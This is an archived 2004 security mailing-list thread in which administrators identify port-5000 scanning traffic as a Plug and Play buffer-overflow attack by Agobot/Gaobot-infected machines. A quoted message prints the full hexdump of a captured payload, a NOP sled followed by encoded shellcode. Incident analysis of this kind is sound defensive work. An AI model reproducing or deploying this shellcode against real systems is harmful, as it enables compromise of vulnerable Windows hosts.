|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: TCP port 5000 syn increasing
From: Mike Barushok (barushok
keycreations.com)
Date: Mon May 17 2004 - 17:14:40 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Exactly identical to the capture posted at:
http://www.linklogger.com/TCP5000_Overflow.htm
(That page has title: 'SQL Slammer Capture').
On Mon, 17 May 2004, Noel Cuillandre wrote:
> It's a buffer overflow attack on the plug and play service on TCP port
> 5000.
> The hexdump corresponds to a SQLSlammer's like worm.
>
> Noel Cuillandre
>
> Paul Schmehl a écrit :
>
> >----- Original Message -----
> >From: "ANDREW STREULE" <brother_wolfbtopenworld.com>
> >To: <incidentssecurityfocus.com>
> >Sent: Monday, May 17, 2004 2:24 PM
> >Subject: Re: TCP port 5000 syn increasing
> >
> >
> >
> >
> >>on my honeypot a port 5000 event is almost always
> >>followed by 1 or 2 nbt smb events.
> >>
> >>
> >>
> >Here's a hexdump of what I'm seeing on 5000. The ones I'm seeing are coming
> >from boxes infected with Agobot/Gaobot and not just 81.x.x.x.
> >
> >00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >000000A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >000000B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >000000C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >000000D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >000000E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >000000F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000100 90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77 ............M?.w
> >00000110 90 90 90 90 FF 63 64 90 90 90 90 90 90 90 90 90 .....cd.........
> >00000120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> >00000130 90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9 ..........ZJ3.f.
> >00000140 66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70 f..4...........p
> >00000150 99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34 .....!.id......4
> >00000160 12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12 ....A....j....j.
> >00000170 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62 ...b....t......b
> >00000180 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B .k...j?.....^..{
> >00000190 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA p....T....ZHx.X.
> >000001A0 50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99 P.......ZXx..X..
> >000001B0 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5 .Z.c.n._..I...q.
> >000001C0 99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D ...._...f.e..A..
> >000001D0 C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE .q............f.
> >000001E0 69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89 i.A^....$.Y.....
> >000001F0 CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE ..f.m...f.a...f.
> >00000200 65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62 e.u..m.B......{b
> >00000210 10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99 .........^......
> >00000220 14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA ............^...
> >00000230 F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA ........f.}.f.q.
> >00000240 59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B Y5.Y.`....fK..2{
> >00000250 77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA w.YZqbgff.......
> >00000260 D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB ................
> >00000270 F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC ................
> >00000280 EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99 ................
> >00000290 EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED ................
> >000002A0 D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA ................
> >000002B0 FA FC E9 ED 99 0D 0A 0D 0A .........
> >
> >Paul Schmehl (paulsutdallas.edu)
> >Adjunct Information Security Officer
> >The University of Texas at Dallas
> >AVIEN Founding Member
> >http://www.utdallas.edu/~pauls/
> >
> >
> >---------------------------------------------------------------------------
> >----------------------------------------------------------------------------
> >
> >
> >
> >
>
>
> ---------------------------------------------------------------------------
> ----------------------------------------------------------------------------
>
--
Mike Barushok
Senior Security Administrator
KeyCreations.com/KCISP.net/ispKansas.com
---------------------------------------------------------------------------
----------------------------------------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]